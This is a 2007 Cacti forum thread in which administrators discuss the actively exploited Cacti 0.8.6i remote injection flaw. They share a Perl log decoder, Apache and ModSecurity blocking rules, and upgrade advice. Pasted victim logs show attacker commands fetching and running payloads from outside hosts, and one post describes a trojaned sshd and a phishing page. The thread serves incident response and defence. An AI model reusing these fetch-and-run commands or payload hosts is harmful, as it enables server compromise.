[Cacti <= 0.8.6i] Remote Injection Exploit

scratchspace · Post by **scratchspace** » Sun Jan 14, 2007 5:36 pm

Being as how we'd all like to know what it is these guys did to machines that were compromised, I wrote a script to decode the commands sent to the server. Fortunately, it appears these guys aren't taking all the steps to cover their tracks. One individual was clever enough to email himself. Enjoy.

Chris

Code: Select all

#!/usr/bin/perl

# Point to the log file
open (FILE, "/var/log/httpd/access_log");
while (<FILE>) {
   chomp;
   # Request for /cacti
   if (/cacti/) {
      # Split the logfile. $line[6] should be the actual request if using common logfile format
      @line = split (/ /, $_);
      $request = $line[6];
      # print "Request: ", $request, "\n";

      # Chopping these up is kinda ugly....
      @items = split (/,/, $request);
      foreach $item (@items) {
         # Look for CHAR, grab the first decimal number, start decoding the rest.
         if ($item =~ /CHAR\(((\d+|\d))/) {
            # print $item, "\n";
            print chr($1);
            $decode = 1;
         }
         # Look for close paren, grab the last decimal number, stop decoding.
         if ($item =~ /(^(\d+|\d)\))/) {
            #print $item, "\n";
            print chr($1), "\n";
            undef $decode;
         }
         # Decode the middle decimal numbers
         if ($decode) {
            print chr($item);
         }
      }
   }
}

dagonet · Post by **dagonet** » Mon Jan 15, 2007 5:36 am

Hello Community,

we should also consider the use of modsecurity http://www.modsecurity.org for apache installations.
I installed this module. So, now if you want to do a request for example on the cmd.php you will get the 403 response code.

For IIS installations is quit easy to put a redirect on particular files:
cacti/cmd.php
cacti/copy_cacti_user.php
cacti/poller.php
cacti/poller_commands.php
cacti/poller_export.php
cacti/poller_reindex_hosts.php
cacti/rebuild_poller_cache.php
cacti/script_server.php
cacti/scripts
cacti/include
cacti/install

You can do it from the management console of the IIS.

Dagonet

Post by **raX** » Wed Jan 17, 2007 10:37 pm

In addition to the official patches for this vulnerability, Cacti version 0.8.6j has just been released.

http://www.cacti.net/release_notes_0_8_6j.php

Be sure to upgrade ASAP!

-Ian

Mehuge · Post by **Mehuge** » Fri Feb 02, 2007 2:25 pm

Humm...

I just did yum update and got 0.8.6i then noticed in this post that 0.8.6j was out, so downloaded and upated using rpm -U cacti-0.8.6j.fc4.i386.rpm

It made me go through the install process again, remembered all my graphs and data sources etc but has lost all historical data.

Is this normal? Is it possible to recover this data? Is it because I upgraded two version without going through the install process in between?

I upgraded (and am in this thread) because my server was compromised via this exploit. Extracts from my logs of the various hack attempts for your reference:-

access_log wrote:80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 303
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /cmd.php HTTP/1.1" 404 285
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /cacti/cmd.php HTTP/1.1" 200 92
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /portal/cacti/cmd.php HTTP/1.1" 404 298
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /portal/cmd.php HTTP/1.1" 404 292
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /stats/cmd.php HTTP/1.1" 404 291

error_log wrote:[client 80.48.30.10] PHP Notice: Undefined index: 1 in /var/lib/cacti/lib/functions.php on line 511
[client 80.48.30.10] PHP Notice: Undefined index: total_polls in /var/lib/cacti/lib/functions.php on line 511
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 512
[client 80.48.30.10] PHP Notice: Undefined index: snmp_community in /var/lib/cacti/lib/functions.php on line 523
[client 80.48.30.10] PHP Notice: Undefined index: max_time in /var/lib/cacti/lib/functions.php on line 536
[client 80.48.30.10] PHP Notice: Undefined index: min_time in /var/lib/cacti/lib/functions.php on line 540
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 544
[client 80.48.30.10] PHP Notice: Undefined index: avg_time in /var/lib/cacti/lib/functions.php on line 545
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 545
[client 80.48.30.10] PHP Notice: Undefined index: status in /var/lib/cacti/lib/functions.php on line 548
[client 80.48.30.10] PHP Notice: Undefined index: status in /var/lib/cacti/lib/functions.php on line 548
[client 80.48.30.10] PHP Notice: Undefined index: status_fail_date in /var/lib/cacti/lib/functions.php on line 624
[client 80.48.30.10] PHP Notice: Undefined index: status_rec_date in /var/lib/cacti/lib/functions.php on line 625
[client 80.48.30.10] PHP Notice: Undefined index: status_last_error in /var/lib/cacti/lib/functions.php on line 626
[client 80.48.30.10] PHP Notice: Undefined index: min_time in /var/lib/cacti/lib/functions.php on line 627
[client 80.48.30.10] PHP Notice: Undefined index: max_time in /var/lib/cacti/lib/functions.php on line 628
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 632
[client 80.48.30.10] PHP Notice: Undefined index: hostname in /var/lib/cacti/lib/functions.php on line 634
--15:22:38-- http://881107.com/ping.txt
=> `ping.txt'
Resolving 881107.com... 221.251.37.64
Connecting to 881107.com|221.251.37.64|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 358 [text/plain]
ping.txt: Permission denied

Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory

Another more detemined attempt was made today using the same exploit but failed again.

Post by **gandalf** » Fri Feb 02, 2007 5:26 pm

When upgrading, make sure to apply latest patches from main cacti site
Reinhard

wolf905 · Post by **wolf905** » Sun Feb 04, 2007 12:05 am

All,

Please excuse me if this is all old news.

I have had cacti lurking in the background on my web server for some time. Being that the machine is a personal web/e-mail server, it doesn't get a lot of attention.

This morning, I discovered my inbox full of errors from the cron daemon. It appears someone was using the cacti exploit to gain access to my system.

This was a non-trivial attack. Even though apache ran in its own userid, the attacker used a kernel exploit (I was running an older linux kernel version, 2.6.17) to gain root access. The attacker successfully replaced my sshd with a trojan, which copied login/passwords to a file in /usr/include/gpm3.h. Also, there was no trace of the commands he ran through the web server. All that I had in the logs were a whole lot of "Connection Refused" errors, and this:

Code: Select all

--22:09:42--  http://207.58.141.211/~gr/ping
           => `ping'
Connecting to 207.58.141.211:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 629 [text/plain]
ping: Permission denied

Cannot write to `ping' (Permission denied).
mv: cannot stat `ping': No such file or directory
Can't open perl script "temp2006": No such file or directory
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
^M100   629  100   629    0     0   6685      0 --:--:-- --:--:-- --:--:--  6685
curl: (23) Failed writing body
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
^M100   629  100   629    0     0   6701      0 --:--:-- --:--:-- --:--:--  6701^M100   629  100   629    0     0   6688      0 --:-
-:-- --:--:-- --:--:--     0
Error: Connection refused

What the attacker failed to do was log into my system. The sshd they installed broke my sshd configuration (I have a slightly unusual setup), and they were thereafter unable to log in. He did a decent job of covering his tracks, and deleted my cacti.log, but left enough of a trail for me to identify what he was doing. Regardless, this idiot caused my system to reload, broke in far enough to warrant re-imaging (upgrading to FC6), and ticked me off.

A previous attacker attempted to gain access to my system on the 25th of Jan, but was unable to break out of the apache user account. This attackers attempts were fairly well documented in the log files as a series of attempts to use the basic milw0rm.com exploit.

Just thought I'd document my findings, and let people know that this is being actively exploited in the wild. If you have any system holes (like my kernel privilege escalation vulnerability), this cacti vulnerability could be big trouble.

Good luck,
WLF

kaptk2 · Post by **kaptk2** » Sun Feb 11, 2007 2:01 am

What is the best way to recover from this attack? Can anybody offer hints on what to do to clean up a compromised system?

Post by **rony** » Sun Feb 11, 2007 12:21 pm

If you even suspect a compermise, I would suggest a system reload.

You can backup and restore your cacti installation, not the whole server.

shahzadmasih · Post by **shahzadmasih** » Wed Feb 28, 2007 9:24 am

Hi, This post is very informative, however I would like some specific information. If someone can help me then please send me a private message. Best Regards,

Post by **rony** » Wed Feb 28, 2007 9:46 am

shahzadmasih wrote:Hi, This post is very informative, however I would like some specific information. If someone can help me then please send me a private message. Best Regards,

What would you like more information on?

JJX · Post by **JJX** » Wed Apr 04, 2007 1:05 pm

dagonet wrote:Hello Community,

we should also consider the use of modsecurity http://www.modsecurity.org for apache installations.
I installed this module. So, now if you want to do a request for example on the cmd.php you will get the 403 response code.

For IIS installations is quit easy to put a redirect on particular files:
cacti/cmd.php
cacti/copy_cacti_user.php
cacti/poller.php
cacti/poller_commands.php
cacti/poller_export.php
cacti/poller_reindex_hosts.php
cacti/rebuild_poller_cache.php
cacti/script_server.php
cacti/scripts
cacti/include
cacti/install

You can do it from the management console of the IIS.

Dagonet

is possible to share with up the configuration of mod_security that affect cacti?

mooreds · Post by **mooreds** » Fri Apr 06, 2007 12:53 pm

dagonet wrote:Hello Community,

we should also consider the use of modsecurity http://www.modsecurity.org for apache installations.
I installed this module. So, now if you want to do a request for example on the cmd.php you will get the 403 response code.

For IIS installations is quit easy to put a redirect on particular files:
cacti/cmd.php
cacti/copy_cacti_user.php
cacti/poller.php
cacti/poller_commands.php
cacti/poller_export.php
cacti/poller_reindex_hosts.php
cacti/rebuild_poller_cache.php
cacti/script_server.php
cacti/scripts
cacti/include
cacti/install

You can do it from the management console of the IIS.

Dagonet

You can block access to cacti files and directories with Apache as well, and I don't know if you need mod_security. Inside your virtual server or document root, put entries like this:

Code: Select all

    <Files cmd.php>
            Order allow,deny
            Deny from all
    </Files>

    <Directory /usr/local/cacti-0.8.6j/log>
            Order allow,deny
            Deny from all
    </Directory>

See http://httpd.apache.org/docs/1.3/mod/co ... #directory and http://httpd.apache.org/docs/1.3/mod/core.html#files for more.

JustJoe · Post by **JustJoe** » Sun Jun 10, 2007 3:51 pm

Ofcourse this vulnerability is solved now, but i just wanted to let people know its ABSOLUTELY VITAL to UPDATE. I just found out the hard way: I was hacked. Big time. They managed to put a Paypal phishing site on my home webby using this vulnerability.

A few days ago i got a call from my isp informing me they had shutdown my internet connection because they received notice from Verisign that a fraudulent website was active on my IP. I fell out of my chair. Seriously.
Going through Apache logs i found when they hacked in. Only 15 hours after they got in the phishing started. The log shows countless GET's on url's like

Code: Select all

 /cacti/rra/www.paypal.fr/cgi-bin/webscr/
SignIn&co_partnerId=2&pUserId=&siteid=0&pageType=&pa1/
Update-profile-notify/index.html

They must have send out e-mails to lots of paypal.fr clients persuading them to 'reactivate their account'. I found this picture of what it must've looked like.

The phishing lasted for 4 days. Now my isp has disconnected me during the investigation. I'm quite confident i'll be proven innocent and get my internet connection back next week. So no real harm done to me but i don't know how many people fell for this shit and gave the criminals their Paypal login and/or CC credentials....

So, the moral of the story, as said before:

ALWAYS KEEP YOUR SOFTWARE UP-TO-DATE !

Cacti

[Cacti <= 0.8.6i] Remote Injection Exploit

Exploits in the Wild

Who is online